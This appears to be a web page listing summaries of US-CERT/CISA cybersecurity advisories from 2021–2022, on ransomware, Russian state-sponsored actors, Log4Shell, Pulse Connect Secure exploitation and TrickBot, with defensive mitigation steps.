US-CERT Blog Alerts

AA22-040A: 2021 Trends Show Increased Globalized Threat of Ransomware

Published February 9, 2022

date: February 9, 2022 | Last revised: February 10, 2022

Summary

Immediate Actions You Can Take Now to Protect Against Ransomware: • Update your operating system and software.
• Implement user training and phishing exercises to raise awareness about the risk of suspicious links and attachments.
• If you use Remote Desktop Protocol (RDP), secure and monitor it.
• Make an offline backup of your data.
• Use multifactor authentication (MFA).

AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure

Published January 11, 2022

date: January 11, 2022 | Last revised: March 1, 2022

Summary

Actions Critical Infrastructure Organizations Should Implement to Immediately Strengthen Their Cyber Posture.
• Patch all systems. Prioritize patching known exploited vulnerabilities.
• Implement multi-factor authentication.
• Use antivirus software.
• Develop internal contact lists and surge support.

AA21-356A: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities

Published December 22, 2021

date: December 22, 2021 | Last revised: December 23, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) are releasing this joint Cybersecurity Advisory (CSA) to provide mitigation guidance on addressing vulnerabilities in  Apache’s Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046, and CVE-2021-45105. Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited.

AA21-148A: Sophisticated Spearphishing Campaign Targets Government Organizations, IGOs, and NGOs

Published May 28, 2021

date: May 28, 2021

Summary

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9. See the…

AA21-116A: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders

Published April 26, 2021

date: April 26, 2021

Summary

The Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium—will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled “Russian SVR Targets U.S. and Allied Networks,” released on April 15, 2021.

AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities

Published April 20, 2021

date: April 20, 2021 | Last revised: May 28, 2021

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.

AA21-076A: TrickBot Malware

Published March 17, 2021

date: March 17, 2021 | Last revised: May 20, 2021

Summary

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the…

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

AbuseIPDB Contributor Badge

© 2025, Network Services Group |  216.73.216.60
Contributor,  Detroit Internet Exchange